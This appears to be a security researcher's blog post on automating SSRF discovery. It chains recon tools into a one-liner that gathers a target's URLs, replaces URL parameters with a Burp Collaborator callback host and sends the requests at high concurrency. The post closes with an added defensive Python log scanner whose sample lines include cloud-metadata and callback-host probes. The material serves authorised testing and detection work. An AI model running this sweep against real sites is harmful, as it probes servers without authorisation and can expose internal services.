Hi, everyone
My name is Saumya Agrawal, I'm a security researcher from India. In this article I will describe how I was able to find SSRF vulnerabilities by automating the search for them.
Tools:
1. assetfinder: https://github.com/tomnomnom/assetfinder
2. gau: https://github.com/lc/gau
3. waybackurls: https://github.com/tomnomnom/waybackurls
4. httpx: https://github.com/projectdiscovery/httpx
5. gf: https://github.com/tomnomnom/gf
For the gf tool, you can find patterns here: https://github.com/1ndianl33t/Gf-Patterns
6. qsreplace: https://github.com/tomnomnom/qsreplace
7. ffuf: https://github.com/ffuf/ffuf
Method:
Let's take example.com as our target. First we enumerate all subdomains of the target with assetfinder:
# assetfinder -subs-only example.com | sort -u >> domain.txt
Next we collect all known URLs: waybackurls for the subdomains, and gau for the main domain.
Either tool can be used for both the domain and its subdomains; it is a matter of preference.
# cat domain.txt | waybackurls >> urls.txt
# gau example.com >> urls.txt (or you can use # waybackurls example.com >> urls.txt)
Now we sort the URLs, remove duplicates, keep only the links whose parameters may be vulnerable to SSRF (the gf "ssrf" pattern), check that they are live, and replace the parameter values with your Burp Collaborator link:
# cat urls.txt | sort -u | gf ssrf | httpx -silent | qsreplace "<Burp Collaborator link>" >> blind_ssrf.txt
Finally, we request each of those URLs using the ffuf tool:
# ffuf -c -w blind_ssrf.txt -u FUZZ -t 200
Now check your Burp Collaborator for any pingback.
If you receive a pingback, the URL that triggered it may be vulnerable to SSRF or blind SSRF; a callback only proves the server made an outbound request to your host, so confirm the finding manually before reporting it.
Note: the text after # on each line is the command used in that step (I prefixed the commands with # only to set them apart from the prose; drop the # when running them, since the shell treats it as a comment marker).
Single command:
# assetfinder -subs-only example.com | sort -u | waybackurls >> urls.txt && gau example.com >> urls.txt && cat urls.txt | sort -u | gf ssrf | httpx -silent | qsreplace "<Burp Collaborator link>" >> ssrf.txt && ffuf -c -w ssrf.txt -u FUZZ -t 200
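The sweep above replaces every URL-like parameter with one callback host and waits for a pingback. From the defending side the same sweep is visible in the web server's access log: one client pointing several different parameters at the same unknown host, or at loopback, private or cloud-metadata addresses. The following Python script is an added example, not code from the original post; the parameter-name list (modelled on the kind of names the gf "ssrf" pattern matches), the fetch allowlist and the log lines are constructed assumptions.

```python
import re
from collections import defaultdict
from ipaddress import ip_address
from urllib.parse import parse_qsl, urlsplit

# Names that usually carry a URL the server fetches; an assumption modelled on
# the kind of parameter names the gf "ssrf" pattern looks for.
URL_PARAMS = {"url", "uri", "dest", "redirect", "next", "path", "callback",
              "proxy", "src", "feed", "image", "domain", "host", "link"}
ALLOWED_HOSTS = {"example.com", "cdn.example.com"}  # assumed fetch allowlist
# Combined-log prefix: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')
# Constructed sample lines; "abc123.oastify.example" stands in for a callback host.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /fetch?url=http://cdn.example.com/a.png HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /fetch?url=http://abc123.oastify.example/ HTTP/1.1" 200 12',
    '203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /preview?src=abc123.oastify.example HTTP/1.1" 500 0',
    '203.0.113.5 - - [10/Oct/2023:13:55:38 +0000] "GET /go?next=http://abc123.oastify.example/x HTTP/1.1" 302 0',
    '198.51.100.9 - - [10/Oct/2023:14:01:02 +0000] "GET /fetch?url=http://169.254.169.254/latest/meta-data/ HTTP/1.1" 403 0',
]

def is_internal(host):
    """True for loopback, RFC 1918, link-local (metadata) addresses or localhost."""
    try:
        return ip_address(host).is_private  # also covers loopback and link-local
    except ValueError:
        return host == "localhost"

def extract_fetch_targets(request_target):
    """Yield (param, host) for URL-carrying query parameters of one request."""
    for name, value in parse_qsl(urlsplit(request_target).query):
        if name.lower() in URL_PARAMS:
            host = urlsplit(value if "://" in value else "//" + value).hostname
            if host:
                yield name, host.lower()

def find_ssrf_probes(log_lines):
    """Return (findings, sweeps). A sweep is one client pointing three or more
    distinct parameters at the same foreign host, the footprint of qsreplace."""
    findings, by_host = [], defaultdict(set)
    for m in filter(None, map(LOG_RE.match, log_lines)):
        client, target, status = m.groups()
        for param, host in extract_fetch_targets(target):
            if host in ALLOWED_HOSTS:
                continue
            reason = "internal-address" if is_internal(host) else "foreign-host"
            findings.append({"client": client, "param": param, "host": host,
                             "reason": reason, "status": int(status)})
            by_host[(client, host)].add(param)
    return findings, {k: len(v) for k, v in by_host.items() if len(v) >= 3}
```

Run it against real combined-format logs by replacing SAMPLE_LOG with the file's lines; the sweep count is the stronger signal, since a single odd parameter value is common noise.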